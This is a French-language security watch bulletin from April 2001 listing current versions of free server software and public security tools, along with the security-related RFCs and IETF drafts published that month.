LOGICIELS LIBRES 

Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons 

d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme 

dédiée. 

RESEAU 

Nom Fonction Ver. Date Source 

BIND Gestion de Nom (DNS) 9.1.1 28/03/01 http://www.isc.org/products/BIND 

DHCP Serveur d'adresse 3.0rc2pl1 24/04/01 http://www.isc.org/products/DHCP/dhcp-v3.html 

NTP4 Serveur de temps 4.0.99k23 11/04/01 http://www.eecis.udel.edu/~ntp 

WU-FTP Serveur de fichiers 2.6.1 02/07/00 http://www.wu-ftpd.org 

NTP: la version 4.0.99k est vulnérable à une attaque portant sur un débordement de buffer. 

MESSAGERIE 


IMAP4 Relevé courrier 2000c 20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html 

POP3 Relevé courrier 4.0 25/04/01 http://www.eudora.com/qpopper_general/ 

SENDMAIL Serveur de courrier 8.12.0b7 04/04/01 http://www.sendmail.org 

WEB 


APACHE Serveur WEB 

1.3.19 28/02/01 http://httpd.apache.org/dist 

2.0.16b 04/04/01 

ModSSL API SSL Apache 1.3.19 2.8.2 30/03/01 http://www.modssl.org/ 

MySQL Base SQL 3.23.37 20/04/01 http://www.mysql.com/downloads/index.html 

SQUID Cache WEB 2.4s1 20/03/01 http://www.squid-cache.org 

AUTRE 


INN Gestion des news 2.3.1 11/01/01 http://www.isc.org/products/INN 

MAJORDOMO Gestion des listes 1.94.5 15/01/00 http://www.greatcircle.com/majordomo 

OpenCA Gestion de certificats 0.2.0-5 26/01/01 http://www.openca.org 

OpenLDAP Gestion de l'annuaire 2.0.7 06/11/00 http://www.openldap.org 

LES OUTILS 

Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les 

tableaux suivants. 

LANGAGES 


Perl Scripting 5.6.1 23/04/00 http://www.cpan.org/src/index.html 

PHP WEB Dynamique 4.0.4pl1 11/01/01 http://www.php.net 

ANALYSE RESEAU 


Big Brother Visualisateur snmp 1.7.b4 11/04/01 http://maclawran.ca/bb-dnld/new-dnld.html 

Dsniff Boite à outils 2.3 17/12/00 http://www.monkey.org/~dugsong/dsniff 

EtherEal Analyse multiprotocole 0.8.17 12/04/01 http://www.ethereal.com 

IP Traf Statistiques IP 2.4.0 20/03/01 http://cebu.mozcom.com/riker/iptraf/ 

Nstreams Générateur de règles 1.0.0 11/11/00 http://www.hsc.fr/ressources/outils/nstreams/download/ 

SamSpade Boite à outils 1.14 10/12/99 http://www.samspade.org/ssw/ 

TcpDump Analyse multiprotocole 3.6.2 05/02/01 http://www.tcpdump.org/ 

ANALYSE DE JOURNAUX 


Analog Journaux serveur http 4.16 13/02/01 http://www.analog.cx 

Autobuse Analyse syslog 1.13 31/01/00 http://www.picante.com/~gtaylor/autobuse 



Avril 2001 

SnortSnarf Analyse Snort 041501 15/04/01 http://www.silicondefense.com/software/snortsnarf/ 

WebAlizer Journaux serveur http 2.01-06 17/10/00 http://www.mrunix.net/webalizer/ 

ANALYSE DE SECURITE 


curl Analyse http et https 7.7.2 23/04/01 http://curl.haxx.se/ 

Nessus Vulnérabilité réseau 1.0.7a 30/01/00 http://www.nessus.org 

Nmap Vulnérabilité réseau 2.53 05/09/00 http://www.insecure.org/nmap 

2.54B22 10/03/01 

Pandora Vulnérabilité Netware 4.0b2.1 12/02/99 http://www.packetfactory.net/projects/pandora/ 

Saint Vulnérabilité réseau 3.2.1 12/04/01 http://www.wwdsi.com/saint 

Sara Vulnérabilité réseau 3.3.5 25/03/01 http://www-arc.com/sara 

Tara (tiger) Vulnérabilité système 2.0.9 07/09/99 http://www-arc.com/tara 

Tiger Vulnérabilité système 2.2.4p1 19/07/99 ftp://net.tamu.edu/pub/security/TAMU/tiger 

Trinux Boite à outils 0.8pre1 22/10/00 http://www.io.com/~mdfranz/trinux/boot-images/ 

CONFIDENTIALITE 


OpenPGP Signature/Chiffrement http://www.openpgp.org/ 

GPG Signature/Chiffrement 1.0.4p1 30/11/00 http://www.gnupg.org 

CONTROLE D'ACCES 


TCP Wrapper Accès services TCP 7.6 ftp://ftp.cert.org/pub/tools/tcp_wrappers 

Xinetd Inetd amélioré 2.1.89p14 18/01/01 http://www.xinetd.org 

CONTROLE D'INTEGRITE 


Tripwire Intégrité LINUX 2.3.47 15/08/00 http://www.tripwire.org/downloads/index.php 

DETECTION D'INTRUSION 


Deception TK Pot de miel 19990818 18/08/99 http://all.net/dtk/dtk.html 

Snort IDS Système 1.7 05/01/01 http://www.snort.org 

Shadow IDS Réseau 1.6 01/07/00 http://www.nswc.navy.mil/ISSEC/CID/ 

GENERATEURS DE TEST 


FireWalk Analyse filtres 1.0 03/02/01 http://www.packetfactory.net/firewalk 

FragRouter Fragments IP 1.6 21/09/97 http://www.anzen.com/research/nidsbench/ 

IPSend Paquets IP 2.1a 19/09/97 ftp://coombs.anu.edu.au/pub/net/misc 

IDSWakeUp Détection d'intrusion 1.0 13/10/00 http://www.hsc.fr/ressources/outils/idswakeup/download/ 

TcpReplay Sessions TCP 1.0.1 19/05/97 http://www.anzen.com/research/nidsbench/ 

UdpProbe Paquets UDP 1.2 13/02/96 http://sites.inka.de/sites/bigred/sw/udpprobe.txt 

PARE-FEUX 


DrawBridge PareFeu FreeBsd 3.1 19/04/00 http://drawbridge.tamu.edu 

IpFilter Filtre datagramme 3.4.17 07/04/01 http://coombs.anu.edu.au/ipfilter/ip-filter.html 

Cooker PareFeu Linux Experim. 26/02/01 http://www.linux-mandrake.com/fr/cookerdevel.php3 

Sinus PareFeu Linux 0.1.6 01/09/00 http://www.ifi.unizh.ch/ikm/SINUS/firewall 

TUNNELS 


CIPE Pile Crypto IP (CIPE) 1.5.1 11/02/01 http://sites.inka.de/sites/bigred/devel/cipe.html 

FreeSwan Pile IPSec 1.9 27/03/01 http://www.freeswan.org 

http-tunnel Encapsulation http 3.0.5 06/12/00 http://www.nocrew.org/software/httptunnel.html 

3.3 (dev) 08/03/01 

OpenSSL Pile SSL 0.9.6a 05/04/01 http://www.openssl.org/ 

OpenSSH Pile SSH 1 et 2 2.5.2 19/03/01 http://www.openssh.com/ 

SSF Pile SSH 1 autorisée 1.2.27.6 16/09/99 http://info.in2p3.fr/secur/ssf 

Stunnel Proxy https 3.14 22/02/01 http://www.stunnel.org 

Zebedee Tunnel TCP/UDP 2.2.1 09/02/01 http://www.winton.org.uk/zebedee/ 



Avril 2001 

NORMES ET STANDARDS 

LES PUBLICATIONS DE L'IETF 

LES RFC 

Du 23/03/2001 au 20/04/2001, 14 RFC ont été publiés dont 2 RFC ayant trait à la sécurité 

et …. trois poissons d'Avril !!! 

RFC TRAITANT DE LA SECURITE 

Thème Num Date Etat Titre 

MPPE 3078 03/01 Inf Microsoft Point-To-Point Encryption (MPPE) Protocol 

3079 03/01 Inf Deriving Keys for use with Microsoft Point-to-Point Encryption (MPPE) 

HOAX 3093 04/01 Inf Firewall Enhancement Protocol (FEP) 

RFC TRAITANT DE DOMAINES CONNEXES A LA SECURITE 


LDAP 3088 04/01 Exp OpenLDAP Root Service An experimental LDAP referral service 

ECML 3106 04/01 Inf ECML v1.1: Field Specifications for E-Commerce 

AUTRES RFC 


IP 3115 04/01 Pst Mobile IP Vendor/Organization-Specific Extensions 

MISC 3086 04/01 Inf Definition of Differentiated Services Per Domain Behaviors and Rules for their Specification 

3098 04/01 Inf How to Advertise Responsibly Using E-Mail & News - how NOT to $$$$ MAKE ENEMIES FAST! $$$$ 

SIP 3087 04/01 Inf Control of Service Context using SIP Request-URI 

TLI 3094 04/01 Inf Transport Adapter Layer Interface 

XML 3075 03/01 Pst XML-Signature Syntax and Processing 

3076 03/01 Inf Canonical XML Version 1.0 

HOAX 3091 04/01 Inf Pi Digit Protocol 

HOAX 3092 04/01 Inf Etymology of "FOO" 

LES DRAFTS 

Du 23/03/2001au 20/04/2001, 260 drafts ont été publiés: 175 drafts mis à jour, 85 

nouveaux drafts, dont 13 drafts ayant directement trait à la sécurité. 

NOUVEAUX DRAFTS TRAITANT DE LA SECURITE 

Thème Nom du Draft Date Titre 

DNS draft-ietf-dnsext-parent-sig-00 30/03 Parent's SIG over child's KEY 

draft-ietf-dnsext-parent-stores-zone-keys-00 30/03 Parent stores the child's zone KEYs 

MOBILEIP draft-mkhalil-mobileip-ipv6-sap-00 30/03 Dynamic Security Association Establishment Protcol For IPv6 

draft-perkins-bake-00 11/04 Binding Authentication Key Establishment Protocol for Mobile IPv6 

NAT draft-davies-fw-nat-traversal-00 02/04 Traversal of non-Protocol Aware Firewalls & NATS 

OTP draft-nesser-otp-sha-256-384-512-00 02/04 AES Companion Hash Def. (SHA256, SHA384, SHA512) for OTP 

PKIX draft-ietf-msec-gsakmp-sec-00 22/03 Group Secure Association Key Management Protocol 

draft-ietf-pkix-rfc2797-bis-00 13/04 Certificate Management Messages over CMS 

PROTECT draft-lloyd-protectedattrs-00 22/03 A Framework for Cryptographically Protected Attribute Values 

SASL draft-myers-saslrev-00 29/03 Simple Authentication and Security Layer (SASL) 

SMTP draft-bose-smtp-integrity-00 04/04 Checking of Message Integrity During SMTP Transactions 

SSH draft-friedl-secsh-fingerprint-00 30/03 SSH Fingerprint Format 

SUCV draft-montenegro-sucv-00 11/04 Statistically Unique & Cryptographically verifiable Identif.. & Addr. 

MISE A JOUR DE DRAFTS TRAITANT DE LA SECURITE 


CAT draft-ietf-cat-sasl-gssapi-03 02/04 SASL GSSAPI mechanisms 

COPS draft-gross-cops-sip-01 13/04 COPS Usage for SIP 



Avril 2001 

DNS draft-ietf-dnsext-rsa-03 12/04 RSA/SHA-1 SIGs and RSA KEYs in the Domain Name System 

draft-lewis-state-of-dnssec-01 23/03 Notes from the State-Of-The-Technology: DNSSEC 

EDI draft-ietf-ediint-as1-12 09/04 MIME-based Secure EDI 

draft-ietf-ediint-as2-08 05/04 HTTP Transport for Secure EDI 

IDS draft-ietf-idwg-iap-05 11/04 IAP: Intrusion Alert Protocol 

IETF draft-rescorla-sec-cons-03 30/03 Guidelines for Writing RFC Text on Security Considerations 

IKE draft-beaulieu-ike-xauth-01 02/04 Extended Authentication within IKE (XAUTH) 

draft-dukes-ike-mode-cfg-01 02/04 The ISAKMP Configuration Method 

IPSEC draft-ietf-ipsec-ike-auth-ecdsa-02 30/03 IKE Authentication Using ECDSA 

draft-ietf-ipsec-ike-ecc-groups-03 30/03 Additional ECC Groups For IKE 

draft-ietf-ipsec-openpgp-01 23/03 OpenPGP Key Usage in IKE 

MOBILEIP draft-haverinen-mobileip-gsmsim-02 11/04 GSM SIM Authentication and Key Generation for Mobile IP 

draft-skibbie-krb-kdc-ldap-schema-01 30/03 Kerberos KDC LDAP Schema 

PGP draft-ietf-openpgp-mime-06 10/04 MIME Security with OpenPGP 

PKIX draft-ietf-pkix-new-part1-06 09/04 Internet X.509 PKI Certificate and CRL Profile 

draft-ietf-pkix-pi-02 02/04 Internet X.509 Public Key Infrastructure Permanent Identifier 

draft-ietf-pkix-time-stamp-14 06/04 Internet X.509 PKI Time Stamp Protocols (TSP) 

draft-orman-public-key-lengths-02 22/03 Determining strengths for PK used for exchanging symmetric keys 

PPP draft-haverinen-pppext-eap-sim-01 11/04 EAP SIM Authentication (Version 1) 

SACRED draft-ietf-sacred-reqs-02 30/03 Securely Available Credentials - Requirements 

SHA draft-eastlake-sha1-01 11/04 US Secure Hash Algorithm 1 (SHA1) 

SIP draft-gross-sipaq-01 13/04 QoS and AAA Usage with SIP Based IP Communications 

SMIME draft-ietf-smime-aes-alg-01 23/03 Use of the Advanced Encryption Algorithm in CMS 

draft-ietf-smime-esformats-04 09/04 Electronic Signature Formats for long term electronic signatures 

draft-ietf-smime-espolicies-01 09/04 Electronic Signature Policies 

SSH draft-nisse-secsh-srp-01 30/03 Using the SRP protocol as a key exchange method in Secure Shell 

SSL draft-murray-auth-ftp-ssl-07 09/04 Securing FTP with TLS 

TLS draft-ietf-tls-ecc-01 30/03 ECC Cipher Suites For TLS 

draft-ietf-tls-openpgp-01 23/03 Extensions to TLS for OpenPGP keys 

TRACK draft-ietf-rmt-pi-track-security-01 06/04 Security Requirements For TRACK 

DRAFTS TRAITANT DE DOMAINES CONNEXES A LA SECURITE 


BEEP draft-mrose-beep-design-03 30/03 On the Design of Application Protocols 

BGP draft-berkowitz-bgpcon-01 09/04 Benchmarking Methodology for Exterior Routing Convergence 

DIAMETER draft-ietf-aaa-diameter-02 09/04 Diameter Base Protocol 

draft-ietf-aaa-diameter-api-00 11/04 The DIAMETER API 

draft-ietf-aaa-diameter-mobileip-02 09/04 Diameter Mobile IP Extensions 

draft-ietf-aaa-diameter-nasreq-02 09/04 Diameter NASREQ Extensions 

DNS draft-ietf-dnsop-hardie-shared-root-server-04 22/03 Distributing Root / Authoritative NS via shared unicast addresses 

draft-slone-dn2fqdn-00 11/04 Converting LDAP/X.500 DN to DNS to support server location 

ECML draft-ietf-trade-ecml2-req-01 02/04 Electronic Commerce Modeling Language: Version 2 Requirements 

IPS draft-ietf-ips-iscsi-reqmts-03 20/04 iSCSI Requirements and Design Considerations 

LDAP draft-greenblatt-ldapext-style-01 02/04 LDAP Extension Style Guide 

draft-greenblatt-ldap-perms-00 03/04 Application Defined Permissions for LDAP 

draft-ietf-ldapbis-iana-01 12/04 IANA Considerations for LDAP 

draft-ietf-ldapbis-user-schema-00 06/04 A Summary of the X.500 User Schema for use with LDAPv3 

draft-rharrison-ldap-framing-profile-00 22/03 Profile for Framing LDAPv3 Operations 

draft-rharrison-ldap-intermediate-resp-00 02/04 LDAP Intermediate Response 

draft-weltman-ldap-java-controls-06 29/03 Java LDAP Controls 

draft-zeilenga-ldap-cancel-03 02/04 LDAP Cancel Extended Operation 

draft-zeilenga-ldap-dnsref-00 02/04 Use of DNS SRV in LDAP Named Subordinate References 

draft-zeilenga-ldap-features-00 04/04 Feature Discovery in LDAP 

draft-zeilenga-ldap-grouping-02 02/04 LDAPv3: Grouping of Related Operations 

draft-zeilenga-ldap-idn-01 03/04 International Domain Names and LDAP 

draft-zeilenga-ldap-opattrs-00 04/04 LDAPv3: All Operational Attributes 

draft-zeilenga-ldap-txn-02 03/04 LDAPv3 Transactions 

draft-zeilenga-ldapv3bis-opattrs-06 02/04 LDAPv3: All Operational Attributes 

LDUP draft-ietf-ldup-replica-req-08 29/03 LDAPv3 Replication Requirements 

draft-ietf-ldup-subentry-08 06/04 LDAP Subentry Schema 

MPLS draft-shah-mpls-l2vpn-ext-00 22/03 Extensions to MPLS-based Layer 2 VPNs 

NAT draft-ietf-nat-app-guide-05 22/03 NAT Friendly Application Design Guidelines 

draft-ietf-nat-interface-framework-03 10/04 Framework for interfacing with Network Address Translator 

NGTRANS draft-ietf-ngtrans-isatap-00 23/03 Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) 

PILC draft-ietf-pilc-pep-06 05/04 Perf. Enhancing Proxies That Improve Link-Related Degradations 

POLICY draft-ietf-policy-core-schema-10 02/04 Policy Framework LDAP Core Schema 

draft-ietf-policy-pcim-ext-01 09/04 Policy Core Information Model Extensions 

PPP draft-shimizu-ppp-mapos-01 02/04 MAPOS/PPP Tunneling mode 

SPPI draft-ietf-rap-sppi-06 13/04 Structure of Policy Provisioning Information (SPPI) 

SYSLOG draft-ietf-syslog-reliable-05 30/03 Reliable Delivery for Syslog 

draft-ietf-syslog-syslog-07 30/03 Syslog Protocol 

AUTRES DRAFTS 



Avril 2001 


3GPP draft-3gpp-collaboration-01 12/04 3GPP-IETF Standardization Collaboration 

draft-jonsson-3gpp2-rohc-rtp-0-byte-requirements-00 30/03 3GPP2 Requirements for 0-byte ROHC IP/UDP/RTP Header comp. 

AAP draft-ietf-malloc-aap-04 11/04 Multicast Address Allocation Protocol (AAP) 

ADSL draft-ietf-adslmib-adslext-07 12/04 Definitions of Extention Managed Objects for ADSL Lines 

draft-ietf-adslmib-hdsl2-09 03/04 Definitions of Managed Objects for HDSL2 and SHDSL Lines 

AFPHB draft-bianchi-blefari-admcontr-over-af-phb-00 22/03 Per Flow Admission Control over AF PHB Classes 

APEX draft-ietf-apex-access-00 09/04 The APEX Access Service 

draft-ietf-apex-core-00 09/04 The Application Exchange Core 

draft-ietf-apex-presence-00 09/04 The APEX Presence Service 

ARK draft-kunze-ark-01 02/04 The ARK Persistent Identifier Scheme 

ATOM draft-ietf-atommib-atm2-17 10/04 Definitions of Supplemental Managed Objects for ATM Interface 

draft-ietf-atommib-sonetaps-mib-04 03/04 Definitions of Managed Objects for SONET Linear APS Architect. 

AVT draft-ietf-avt-rtp-amr-06 02/04 RTP payload & file storage format for AMR & AMR-WB audio 

BINARY draft-netstrap-binary-encod-conver-00 04/04 METHOD OF ENCODING BINARY DATA (Version I) 

CAN draft-cafi-can-ip-00 22/03 IP over CAN 

CDNP draft-penno-cdnp-nacct-userid-03 04/04 User Profile Information Protocol 

COPS draft-boutaba-copsprmp-00 13/04 COPS-PR with Meta-Policy Support 

DHCP draft-ietf-dhc-pv4-reconfigure-04 10/04 DHCP reconfigure extension 

DIFFSER draft-ietf-diffserv-new-terms-04 29/03 New Terminology for Diffserv 

draft-ietf-diffserv-rfc2598bis-01 13/04 An Expedited Forwarding PHB 

DIR draft-alvestrand-directory-defs-02 10/04 Definitions for talking about directories 

DISMAN draft-ietf-disman-script-mib-v2-03 11/04 Definitions of Managed Objects for the Delegation of mgmt Scripts 

draft-ietf-disman-snmp-alarm-mib-01 02/04 SNMP Alarms and MIB Module 

E2E draft-ohta-e2e-multihoming-01 05/04 The Architecture of End to End Multihoming 

ECN draft-ietf-tsvwg-ecn-03 29/03 The Addition of Explicit Congestion Notification (ECN) to IP 

EDI draft-ietf-ediint-req-09 09/04 Requirements for Inter-operable Internet EDI 

ENUM draft-pfautz-yu-enum-adm-01 30/03 ENUM Administrative Process in the U.S.A. 

draft-rutkowski-enum-basis-00 30/03 Development and Basis of International Telephone Numbering 

EPP draft-hollenbeck-epp-contact-01 09/04 Extensible Provisioning Protocol Contact Mapping 

draft-hollenbeck-epp-domain-01 09/04 Extensible Provisioning Protocol Domain Name Mapping 

draft-hollenbeck-epp-host-01 09/04 Extensible Provisioning Protocol Host Mapping 

draft-hollenbeck-epp-tcp-01 09/04 Extensible Provisioning Protocol Transport Over TCP 

draft-ietf-provreg-epp-01 09/04 Extensible Provisioning Protocol 

EXT draft-eastlake-ext-ip-ver-01 02/04 Extended IP Versions 

FAST draft-gan-fast-reroute-00 11/04 A Method for MPLS LSP Fast-Reroute Using RSVP Detours 

FAX draft-ietf-fax-faxaddr-v2-03 23/03 Minimal FAX address format in Internet Mail 

draft-ietf-fax-implementers-guide-07 04/04 Implementers Guide for Facsimile Using Internet Mail 

draft-ietf-fax-minaddr-v2-03 23/03 Minimal GSTN address format in Internet Mail 

FCIP draft-ietf-ips-fcovertcpip-02 20/04 Fibre Channel Over TCP/IP (FCIP) 

FIB draft-ietf-bmwg-fib-term-01 30/03 Terminology for FIB based Router Performance 

GNP draft-wildgrube-gnp-01 05/04 GENERAL NETWORK PROTOCOL (GNP) 

GRE draft-christian-gre-over-clnp-00 22/03 Generic Routing Encapsulation over CLNP networks 

GRRP draft-ietf-provreg-grrp-reqs-01 30/03 Generic Registry-Registrar Protocol Requirements 

H323 draft-levin-iptel-h323-url-scheme-03 05/04 H.323 URL scheme definition 

HANDLE draft-sun-handle-system-06 12/04 Handle System Overview 

draft-sun-handle-system-def-04 12/04 Handle System Namespace and Service Definition 

draft-sun-handle-system-protocol-01 12/04 Handle System Protocol (ver 2.0) Specification 

HTTP draft-cooper-wrec-known-prob-01 13/04 Known HTTP Proxy/Caching Problems 

draft-mogul-http-delta-08 30/03 Delta encoding in HTTP 

draft-mogul-http-ooo-00 09/04 Support for out-of-order responses in HTTP 

draft-wilson-wrec-wccp-v2-01 03/04 Web Cache Coordination Protocol V2.0 

HUITEMA draft-durand-huitema-high-density-ratio-01 22/03 The High Density ratio for address assignment efficiency …. 

IDN draft-ietf-idn-altdude-00 22/03 AltDUDE version 0.0.2 

draft-ietf-idn-amc-ace-o-00 22/03 AMC-ACE-O version 0.0.3 

draft-ietf-idn-amc-ace-r-00 29/03 AMC-ACE-R version 0.0.0 

draft-ietf-idn-cjk-01 10/04 Han Ideograph (CJK) for Internationalized Domain Names 

draft-ietf-idn-idne-02 22/03 Internationalized domain names using EDNS (IDNE) 

draft-ietf-idn-uname-00 02/04 Internationalized Domain Names and Unique Identifiers/Names 

IDR draft-ietf-idr-route-filter-03 02/04 Cooperative Route Filtering Capability for BGP-4 

draft-ietf-idr-route-oscillation-00 30/03 BGP Persistent Route Oscillation Condition 

IETF draft-hain-msword-template-04 06/04 Using Microsoft Word to create Internet Drafts and RFC's 

draft-ietf-uswg-tao-04 10/04 The Tao of IETF - A Novice's Guide to the Internet Engineering … 

IFCP draft-ietf-ips-ifcp-01 20/04 IFCP - A Protocol for Internet Fibre Channel Storage Networking 

IGMP draft-ietf-idmr-igmp-proxy-00 04/04 IGMP-based Multicast Forwarding ('IGMP Proxying') 

ILB draft-felton-universal-language-00 11/04 International Language Bridge For Implem… Language Free Svs 

IMAP draft-segmuller-imap-structure-00 12/04 IMAP Extension: Structure 

IMPP draft-ietf-impp-cpim-msgfmt-01 02/04 Common Presence and Instant Messaging Message Format 

draft-ietf-impp-datetime-00 03/04 Date and Time on the Internet: Timestamps 

IOTP draft-ietf-trade-iotp-v1.0-papi-05 05/04 Payment API for v1.0 Internet Open Trading Protocol (IOTP) 

IP 

draft-kashyap-ipoib-requirements-00 02/04 IP over InfiniBand (IPoIB)Overview, Issues and Requirements 

draft-nickless-ipv4-mcast-bcp-01 06/04 IPv4 Multicast Best Current Practice 

draft-welzl-opt-lookup-00 22/03 IP Fast Option Lookup 

IPCDN draft-ietf-ipcdn-dvbdev-mib-00 03/04 DVB Cable Interactive Network Adapter Device MIB 

draft-ietf-ipcdn-dvbinaif-mib-00 03/04 DVB Cable Interactive Network Adapter Interface MIB 



Avril 2001 

IPP draft-ietf-ipp-indp-method-05 12/04 IPP: The 'indp' Delivery Method for Event Notifications & Protocol 

draft-ietf-ipp-install-03 12/04 IPP: Printer Installation Extension 

draft-ietf-ipp-notify-get-03 12/04 EPP: The 'ippget' Delivery Method for Event Notifications 

draft-ietf-ipp-url-scheme-03 02/04 Internet Printing Protocol (IPP): IPP URL Scheme 

IPS draft-ietf-ips-fcencapsulation-00 20/04 FC Frame Encapsulation 

IPV6 draft-ietf-ipngwg-default-addr-select-03 29/03 Default Address Selection for IPv6 

draft-ietf-ipngwg-dns-discovery-01 22/03 Analysis of DNS Server Discovery Mechanisms for IPv6 

draft-ietf-ipngwg-ipv6-2260-01 12/04 IPv6 multihoming support at site exit routers 

draft-draves-ipngwg-router-selection-01 29/03 Default Router Preferences and More-Specific Routes 

draft-francis-ipngwg-site-def-00 02/04 IPv6 Site Definition 

draft-itojun-ipv6-flowlabel-api-01 11/04 Socket API for IPv6 flow label field 

draft-itojun-ipv6-local-experiment-02 03/04 Guidelines for IPv6 local experiments 

draft-itojun-ipv6-tclass-api-02 11/04 Socket API for IPv6 traffic class field 

draft-ietf-ngtrans-6to4anycast-03 22/03 An anycast prefix for 6to4 relay routers 

draft-ietf-ngtrans-ipv6-smtp-requirement-00 11/04 IPv6 SMTP operational requirements 

draft-ietf-ngtrans-tcpudp-relay-04 11/04 An IPv6-to-IPv4 transport relay translator 

ISCSI draft-ietf-ips-iscsi-06 20/04 ISCSI 

draft-ietf-ips-iscsi-mib-00 20/04 Definitions of Managed Objects for iSCSI 

draft-ietf-ips-iscsi-name-disc-01 20/04 ISCSI Naming and Discovery Requirements 

draft-ietf-ips-iscsi-slp-00 20/04 Finding iSCSI Targets and Name Servers Using SLP 

draft-otis-iscsi-fullack-00 20/04 ISCSI Full Acknowledgement 

ISIS draft-ietf-isis-ipv6-02 02/04 Routing IPv6 with IS-IS 

draft-shand-isis-restart-00 02/04 Restart signaling for ISIS 

ISNS draft-ietf-ips-isns-02 20/04 ISNS Internet Storage Name Service 

ISP draft-penno-isp-selection-00 04/04 ISP Selection in Open Access Networks 

L2TP draft-elwin-l2tpext-diffserv-00 09/04 Differentiated Services on L2TP Sessions 

draft-ietf-l2tpext-ppp-discinfo-03 05/04 L2TP Disconnect Cause Information 

LDAP draft-ietf-ldapbis-dn-03 03/04 LDAPv3: UTF-8 String Representation of Distinguished Names 

draft-zeilenga-ldapbis-vd-02 03/04 Lightweight Directory Access Protocol: version differences 

MBONE Draft-ietf-mboned-glop-extensions-01 11/04 Extended Allocations in 233/8 

draft-ietf-mboned-iana-ipv4-mcast-guidelines-00 29/03 IANA Guidelines for IPv4 Multicast Address Allocation 

draft-ietf-mboned-ssm232-01 03/04 Source-Specific Protocol Independent Multicast in 232/8 

MIB draft-schoenw-rfc-2593-update-02 12/04 Script MIB Extensibility Protocol Version 1.1 

MIDCOM draft-ietf-midcom-scenarios-00 02/04 MIDCOM Scenarios 

MIDDLE draft-lear-middlebox-discovery-requirements-00 05/04 Requirements for Discovering Middleboxes 

MIME draft-eastlake-ip-mime-05 05/04 IP over MIME 

draft-herriot-application-batchbeep-00 29/03 The MIME Application/BatchBeep Content-type 

draft-herriot-multipart-interleaved-00 29/03 MIME Multipart/Interleaved & Application/Chunk Content-types 

draft-ietf-msgtrk-trkstat-01 23/03 The Message/Tracking-Status MIME Extension 

draft-nussbacher-bourvine-hebrew-email-00 22/03 Hebrew Character Encoding for Internet Messages 

MOBILEIP draft-decarolis-qoshandover-02 09/04 QoS-Aware Handover for Mobile IP: Secondary Home Agent 

draft-ietf-mobileip-gnaie-02 04/04 Generalized NAI Extension (GNAIE) 

draft-ietf-mobileip-mier-06 02/04 Mobile IP Extensions Rationalization (MIER) 

draft-ietf-mobileip-reg-revok-00 13/04 Registration Revocation in Mobile IP 

MPLS draft-awduche-mpls-te-optical-03 06/04 Multi-Protocol Lambda Switching: Combining MPLS Traffic Engi … 

draft-ietf-mpls-ftn-mib-01 02/04 MPLS FEC-To-NHLFE (FTN) MIB Using SMIv2 

draft-ietf-mpls-ldp-state-04 29/03 LDP State Machine 

draft-ietf-mpls-rsvp-tunnel-applicability-02 09/04 Applicability Statement for Extensions to RSVP for LSP-Tunnels 

draft-shah-mpls-l2vpn-reduce-00 22/03 Reducing over-provisioning for MPLS based L2VPN 

draft-suraev-mpls-globl-recov-enhm-00 06/04 Global path recovery enhancement using Notify Reverse LSP 

draft-tommasi-mpls-intserv-00 29/03 Integrated Services across MPLS domains using CR-LDP signaling 

MSDP draft-ietf-msdp-spec-08 03/04 Multicast Source Discovery Protocol (MSDP) 

MULTI6 draft-ietf-multi6-multihoming-requirements-00 22/03 Requirements for IP Multihoming Architectures 

NAS draft-foster-mgcp-nas-00 23/03 NAS packages for MGCP 

NDMP draft-skardal-ndmpv4-02 09/04 Network Data Management Protocol Version 4 

NFS draft-rangan-nfsv4-mib-00 23/03 NFS version 4 MIB for Server Implementations 

NNTP draft-ietf-nntpext-base-13 02/04 Network News Transport Protocol 

NTP draft-ietf-usefor-article-04 06/04 News Article Format 

OPP draft-jseng-provreg-opp-00 11/04 Object Provisioning Protocol (OPP) 

PPP draft-ietf-pppext-aodi-03 11/04 Always On Dynamic ISDN (AODI). 

draft-ietf-pppext-posvcholo-03 09/04 Extending PPP over SONET/SDH, with virtual concatenation, … 

PPPOE draft-penno-pppoe-ext-service-01 04/04 PPPoE Extensions For Seamless Service Selection 

RDMA draft-csapuntz-caserdma-00 22/03 The Case for RDMA 

RMON draft-ietf-rmonmib-iftopn-mib-05 30/03 RMON MIB Extensions for Interface Parameters Monitoring 

ROHC draft-ietf-rohc-tcp-taroc-01 22/03 TCP-Aware RObust Header Compression (TAROC) 

RSERPOO draft-ietf-rserpool-arch-00 03/04 Architecture for Reliable Server Pooling 

draft-ietf-rserpool-reqts-02 03/04 Requirements for Reliable Server Pooling 

RSVP draft-ietf-issll-rsvp-aggr-04 09/04 RSVP Reservations Aggregation 

RTP draft-gentric-avt-mpeg4-multisl-03 06/04 RTP Payload Format for MPEG-4 Streams 

SCMP draft-arnold-scmp-08 30/03 Simple Commerce Messaging Protocol V1 Message Specification 

SCRIBE draft-liu-rohc-scribe-00 23/03 Scalable Robust Efficient Dictionary-Based Compression (SCRIBE) 

SCTP draft-ietf-tsvwg-usctp-00 04/04 SCTP Unreliable Data Mode Extension 

SDP draft-ietf-mmusic-fid-01 03/04 The SDP fid attribute 

SEAMOBY draft-hamid-seamoby-ct-reqs-01 30/03 General Requirements for a Context Transfer Framework 

SIEVE draft-segmuller-sieve-relation-00 10/04 Sieve Extension: Relational Tests 

SIGTRAN draft-ietf-sigtran-sctp-applicability-06 10/04 Stream Control Transmission Protocol Applicability Statement 

draft-ong-sigtran-sctpover-01 05/04 An Overview of the SCTP 



Avril 2001 

SIP draft-ietf-simple-im-00 12/04 SIP Extensions for Instant Messaging 

draft-ietf-simple-presence-00 02/04 SIP Extensions for Presence 

draft-ietf-sip-call-flows-04 02/04 SIP Telephony Call Flow Examples 

draft-ietf-sip-dhcp-04 29/03 DHCP Option for SIP Servers 

draft-ietf-sip-isup-mime-09 23/03 MIME media types for ISUP and QSIG Objects 

draft-ietf-sip-srv-02 29/03 SIP: Session Initiation Protocol -- Locating SIP Servers 

draft-petrie-sip-config-framework-00 22/03 A Framework for SIP User Agent Configuration 

draft-schulzrinne-sip-911-01 29/03 Providing Emergency Call Svc for SIP-based Internet Telephony 

SMB draft-crhertel-smb-url-00 11/04 SMB Filesharing URL Scheme 

SMIME draft-ietf-smime-ecc-04 30/03 Use of ECC Algorithms in CMS 

draft-ietf-smime-pkcs1-00 29/03 Preventing the Million Message Attack on CMS 

SMTP draft-ietf-msgtrk-smtpext-01 23/03 SMTP Service Extension for Message Tracking 

